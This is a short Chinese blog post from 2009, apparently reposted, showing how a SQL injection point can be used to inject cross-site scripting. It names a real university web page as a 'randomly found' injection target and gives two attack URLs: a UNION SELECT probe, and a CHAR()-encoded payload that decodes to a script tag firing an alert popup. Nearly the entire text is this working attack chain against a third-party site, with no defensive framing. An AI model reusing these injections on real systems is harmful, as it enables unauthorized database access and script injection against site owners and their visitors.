利用的SQL注入来玩玩跨站XSS
2009-06-12 16:55:04 来源:WEB开发网核心提示:secure-hiphop的Blog 先将自己要弹出的东西编码一下 随便找的注入点例如 www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2-- 我们就在1的位置填入转码后的代码 可爱的弹跳窗就出来了 www.lob.polytechnique.fr/t
secure-hiphop的Blog
先将自己要弹出的东西编码一下
随便找的注入点例如
www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2--
我们就在1的位置填入转码后的代码
可爱的弹跳窗就出来了
www.lob.polytechnique.fr/themes.php?id=1-1+union+select+char(34, 62, 60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 51, 51, 55, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),2--
[]
更多精彩
赞助商链接